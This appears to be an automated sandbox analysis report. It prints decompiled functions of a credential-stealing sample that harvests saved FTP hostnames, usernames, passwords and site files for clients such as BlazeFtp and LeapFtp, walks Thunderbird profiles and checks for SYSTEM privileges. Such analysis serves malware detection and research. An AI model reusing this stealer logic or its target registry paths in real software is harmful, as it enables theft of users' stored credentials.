                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2088, "Port", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2088, "Remote Dir", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2068);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        						}
                                                                        						E0040D625(_a4, _v2088);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t47;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D63B
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040D66F
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D7F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Pass$Port$Remote Dir$User
                                                                        • API String ID: 1332880857-1775099961
                                                                        • Opcode ID: 7e4d7dfb6fa6862afb164c28a87f7e1523254fbf826ab7bb65f3afbeebe2274a
                                                                        • Instruction ID: fa02369c385350f7445e4dbac51c9b2e56b62a742fd5d540ae24488e7f34cbe6
                                                                        • Opcode Fuzzy Hash: 7e4d7dfb6fa6862afb164c28a87f7e1523254fbf826ab7bb65f3afbeebe2274a
                                                                        • Instruction Fuzzy Hash: 7241A931940118BBDF216FA2CD42BDC7AB6BF08704F14C0B6B648754B1DA7A5E91AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 51%
                                                                        			E00402B27(void* __eax, void* __edx) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				CHAR* _v20;
                                                                        				void* _t21;
                                                                        				int _t26;
                                                                        				int _t32;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        
                                                                        				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
                                                                        					_t42 = 0;
                                                                        					_t21 = GetCurrentProcess();
                                                                        					_push( &_v8);
                                                                        					_push(8);
                                                                        					_push(_t21);
                                                                        					if( *0x41440d() != 0) {
                                                                        						_v12 = 0;
                                                                        						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                                                                        						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
                                                                        							_v16 = E004017EC(_v12);
                                                                        							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
                                                                        							if(_t32 != 0) {
                                                                        								_push( &_v20);
                                                                        								_push( *_v16);
                                                                        								if( *0x414419() != 0) {
                                                                        									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
                                                                        									if(_t39 == 0) {
                                                                        										_t42 = 1;
                                                                        									}
                                                                        									LocalFree(_v20);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v16);
                                                                        						}
                                                                        						CloseHandle(_v8);
                                                                        					}
                                                                        					return _t42;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 00402B56
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001,00000000,00000000,00000000), ref: 00402B84
                                                                        • GetLastError.KERNEL32 ref: 00402B8E
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001,?,00000000,00000000,00000000), ref: 00402BB8
                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
                                                                        • CloseHandle.KERNEL32(00410B87), ref: 00402BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationToken$CloseCurrentErrorFreeHandleLastLocalProcesslstrcmp
                                                                        • String ID: S-1-5-18
                                                                        • API String ID: 887674703-4289277601
                                                                        • Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
                                                                        • Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040C888(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t49;
                                                                        				intOrPtr _t53;
                                                                        				void* _t58;
                                                                        				char* _t59;
                                                                        
                                                                        				_t58 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x3f, 0);
                                                                        				_t59 =  *0x414082; // 0x0
                                                                        				if( *_t59 == 0) {
                                                                        					L5:
                                                                        					E0040417C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
                                                                        					_t34 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
                                                                        					_v24 = _t34;
                                                                        					_v16 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
                                                                        					_v20 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
                                                                        					_v28 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
                                                                        					if(_v16 != 0 && _v20 != 0) {
                                                                        						_t66 = _v24;
                                                                        						if(_v24 != 0) {
                                                                        							E00401486(_a4, 0xbeef0001);
                                                                        							E004014E8(_a4, _v16);
                                                                        							E004014E8(_a4, _v20);
                                                                        							E004014E8(_a4, _v24);
                                                                        							E004014BC(_a4, _v28, _v32);
                                                                        						}
                                                                        					}
                                                                        					E004017D5(_v24);
                                                                        					E004017D5(_v16);
                                                                        					E004017D5(_v20);
                                                                        					E004017D5(_v28);
                                                                        					return E00401553(_t58, _t66, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t49 = StrStrIA(_t59, "BlazeFtp");
                                                                        					_t61 = _t49;
                                                                        					if(_t49 != 0) {
                                                                        						_t53 = E0040234A(_t61, _t59);
                                                                        						if(_t53 != 0) {
                                                                        							_v12 = _t53;
                                                                        							E00404131(_a4, _v12, "site.dat", 0xbeef0000);
                                                                        							E004017D5(_v12);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        				} while ( *_t59 != 0);
                                                                        				goto L5;
                                                                        			}


                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,BlazeFtp), ref: 0040C8AF
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                                        • API String ID: 1884169789-2976447346
                                                                        • Opcode ID: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
                                                                        • Instruction ID: 3013046b71ecd8600bd216ab05a28f2b20a5d622d3359bada96b4353b2a25071
                                                                        • Opcode Fuzzy Hash: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
                                                                        • Instruction Fuzzy Hash: 55310B71940209FADF126BA2CC86FEE7E72AB84714F20813BB510751F1D7794A919B9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406B7B(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char _v2092;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        				intOrPtr* _t64;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2092);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Hostname", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2088);
                                                                        						if(_t64 == 0 || _v2088 != 4) {
                                                                        							_t65 = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								E004017D5(_t65);
                                                                        							}
                                                                        							_v2084 = 0x15;
                                                                        						} else {
                                                                        							 *_t22 =  *_t64;
                                                                        							E004017D5(_t64);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004041BC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2092);
                                                                        							E00401486(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}


                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B91
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406BC5
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D66
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: Hostname$Password$Port$Username
                                                                        • API String ID: 3369285772-1811172798
                                                                        • Opcode ID: 9f7cea86a9d7e4cb23fd6a7f1494058a33729ab209400da08b0670cec60ec65c
                                                                        • Instruction ID: d58266f3bc7653ca31e84fadb1e2cf46137222864ef5a9eb4340578e60140e29
                                                                        • Opcode Fuzzy Hash: 9f7cea86a9d7e4cb23fd6a7f1494058a33729ab209400da08b0670cec60ec65c
                                                                        • Instruction Fuzzy Hash: 7341F67194011CEAEF216F52CC42BDD7AB9BF08304F14C0BAB145750B1EE795EA19F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406947(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				long _t43;
                                                                        				long _t44;
                                                                        				intOrPtr* _t58;
                                                                        
                                                                        				_t43 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t44 = _t43;
                                                                        				if(_t44 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t49);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Server", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_t58 = E00401C8E( *0x4140fe, _v2068, "FtpPort",  &_v2088);
                                                                        						if(_t58 == 0 || _v2088 != 4) {
                                                                        							_t59 = _t58;
                                                                        							if(_t58 != 0) {
                                                                        								E004017D5(_t59);
                                                                        							}
                                                                        							_v2084 = 0x15;
                                                                        						} else {
                                                                        							 *_t21 =  *_t58;
                                                                        							E004017D5(_t58);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t44;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040695D
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406991
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B06
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: FtpPort$Password$Server$Username
                                                                        • API String ID: 3369285772-1828875246
                                                                        • Opcode ID: 54f27ddca477fa0e8bf032fb5598c9cd64d6db72067c8f921924ad2288a971b9
                                                                        • Instruction ID: acd88a8aff8ef73e47380c1a7cd8d89f608d6128b4cd4abc3c603a035cdc8412
                                                                        • Opcode Fuzzy Hash: 54f27ddca477fa0e8bf032fb5598c9cd64d6db72067c8f921924ad2288a971b9
                                                                        • Instruction Fuzzy Hash: 8D413771A4011CFADF22AB62CC42BDD7AB9BF04304F14C0BAB145710B1EE795EA19F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E29C(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				unsigned int _v32;
                                                                        				long _t50;
                                                                        				long _t51;
                                                                        
                                                                        				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t51 = _t50;
                                                                        				if(_t51 != 0) {
                                                                        					return _t51;
                                                                        				}
                                                                        				_v12 = E00401C8E(_a4, _a8, "Site", 0);
                                                                        				_v16 = E00401C8E(_a4, _a8, "UserID", 0);
                                                                        				_v20 = E00401C8E(_a4, _a8, "xflags",  &_v32);
                                                                        				_v24 = E00401C8E(_a4, _a8, "Port", 0);
                                                                        				_v28 = E00401C8E(_a4, _a8, "Folder", 0);
                                                                        				if(_v20 != 0 && _v32 != 0 && E00402A3B(_v20, _v32) != 0) {
                                                                        					_v32 = _v32 >> 1;
                                                                        					if(E004041BC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
                                                                        						E00401486(_a12, 0xbeef0000);
                                                                        						E004014E8(_a12, _v12);
                                                                        						E004014E8(_a12, _v16);
                                                                        						E004014BC(_a12, _v20, _v32);
                                                                        						E004014E8(_a12, _v24);
                                                                        						E004014E8(_a12, _v28);
                                                                        					}
                                                                        				}
                                                                        				E004017D5(_v12);
                                                                        				E004017D5(_v16);
                                                                        				E004017D5(_v20);
                                                                        				E004017D5(_v24);
                                                                        				E004017D5(_v28);
                                                                        				return RegCloseKey(_v8);
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E2AC
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E3DC
                                                                          • Part of subcall function 004041BC: LocalFree.KERNEL32(00000000), ref: 0040423C
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFreeLocalOpenlstrlen
                                                                        • String ID: Folder$Port$Site$UserID$xflags
                                                                        • API String ID: 2116081971-269738940
                                                                        • Opcode ID: f05f6a50ddf9100c9998efcab0c012a27828d9a3f3488f0900caffbd6122895f
                                                                        • Instruction ID: a4a650a3a6283ae73420e32a9eaac4a284f429e24d6150c9826fb7d835094a75
                                                                        • Opcode Fuzzy Hash: f05f6a50ddf9100c9998efcab0c012a27828d9a3f3488f0900caffbd6122895f
                                                                        • Instruction Fuzzy Hash: 3631673195010ABBDF126F92CC46BEE7B72AF04344F10847ABA21751F1D77A8A61EB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004076F4(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t39;
                                                                        				long _t40;
                                                                        
                                                                        				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t40 = _t39;
                                                                        				if(_t40 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t45);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "InstallPath", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "DataDir", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00404131(_a4, _v2072, "sites.dat", 0xbeef0000);
                                                                        							E00404131(_a4, _v2072, "sites.ini", 0xbeef0001);
                                                                        						}
                                                                        						if(_v2076 != 0) {
                                                                        							E00404131(_a4, _v2076, "sites.dat", 0xbeef0000);
                                                                        							E00404131(_a4, _v2076, "sites.ini", 0xbeef0001);
                                                                        						}
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004076F4(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t40;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407707
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040773B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407856
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                                        • API String ID: 1332880857-3870687875
                                                                        • Opcode ID: a1b0c8f118b5cf310e500faf11409689718c414b859c1c221b5c31afa3c4b199
                                                                        • Instruction ID: 927ebaac81f16cff042132974810b193f85d558a295493d701847d58b646bf3e
                                                                        • Opcode Fuzzy Hash: a1b0c8f118b5cf310e500faf11409689718c414b859c1c221b5c31afa3c4b199
                                                                        • Instruction Fuzzy Hash: 7B31367190010CFADF216F51CC42BDDBABABF40304F10C0BAB249750A1DBB96AD19F89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F8D4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t27;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        
                                                                        				_t29 = __eflags;
                                                                        				_t28 = __edx;
                                                                        				_t27 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x5f, 0);
                                                                        				 *0x415824 = 2;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                        				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				 *0x415824 = 3;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                        				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t28, _t29, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F902
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F947
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F962
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F9A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                        • API String ID: 3062143572-138716004
                                                                        • Opcode ID: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
                                                                        • Instruction ID: c0f4bf9869d67093f7a4d6c15c65fc638ecd3aa445a68d8f1d8abc8d79fc93f9
                                                                        • Opcode Fuzzy Hash: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
                                                                        • Instruction Fuzzy Hash: 991142B1690208BADB017B91CD03FC93E655B44748F518077B608741E3D6F989D08B9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004078AB(void* __ecx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t22;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        				char* _t31;
                                                                        				int _t32;
                                                                        				void* _t34;
                                                                        				void* _t36;
                                                                        				void* _t41;
                                                                        				char* _t42;
                                                                        				char* _t43;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0x1b, 0);
                                                                        				_t43 =  *0x414082; // 0x0
                                                                        				_t42 =  *0x414086; // 0x0
                                                                        				if( *_t42 == 0) {
                                                                        					L11:
                                                                        					E0040785F(_t49, _a4, 0x1a); // executed
                                                                        					E0040785F(_t49, _a4, 0x23); // executed
                                                                        					E0040785F(_t49, _a4, 0x1c); // executed
                                                                        					E004076F4(_a4,  *0x4140fe, "SOFTWARE\\LeapWare"); // executed
                                                                        					E004076F4(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
                                                                        					return E00401553(_t41, _t49, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t22 = StrStrA(_t43, "unleap.exe");
                                                                        					if(_t22 == 0) {
                                                                        						__eflags = StrStrIA(_t42, "leapftp");
                                                                        						if(__eflags != 0) {
                                                                        							_t26 = E0040234A(__eflags, _t43);
                                                                        							_push(_t26);
                                                                        							E00404131(_a4, _t26, "sites.dat", 0xbeef0000);
                                                                        							_t28 = _t26;
                                                                        							E00404131(_a4, _t28, "sites.ini", 0xbeef0001);
                                                                        							E004017D5();
                                                                        						}
                                                                        					} else {
                                                                        						_t31 = _t22 + 1;
                                                                        						if( *_t31 != 0) {
                                                                        							_t32 = lstrlenA("unleap.exe");
                                                                        							_t41 = _t31;
                                                                        							_t34 = E0040234A(_t32 + _t41, _t32 + _t41);
                                                                        							_push(_t34);
                                                                        							E00404131(_a4, _t34, "sites.dat", 0xbeef0000);
                                                                        							_t36 = _t34;
                                                                        							E00404131(_a4, _t36, "sites.ini", 0xbeef0001);
                                                                        							E004017D5();
                                                                        						}
                                                                        					}
                                                                        					while( *_t43 != 0) {
                                                                        						_t43 =  &(_t43[1]);
                                                                        						__eflags = _t43;
                                                                        					}
                                                                        					_t43 =  &(_t43[1]);
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t49 =  *_t42;
                                                                        				} while ( *_t42 != 0);
                                                                        				goto L11;
                                                                        			}















                                                                        APIs
                                                                        • StrStrA.SHLWAPI(00000000,unleap.exe), ref: 004078DD
                                                                        • lstrlenA.KERNEL32(unleap.exe,00000001,00000000,unleap.exe), ref: 004078F2
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • StrStrIA.SHLWAPI(00000000,leapftp,00000000,unleap.exe), ref: 00407936
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                                                        • API String ID: 1884169789-1497043051
                                                                        • Opcode ID: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
                                                                        • Instruction ID: 9698fba736c6e1230d64bcfce157fb16b9fb49397a8a83bf77b3dc4cab1f149d
                                                                        • Opcode Fuzzy Hash: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
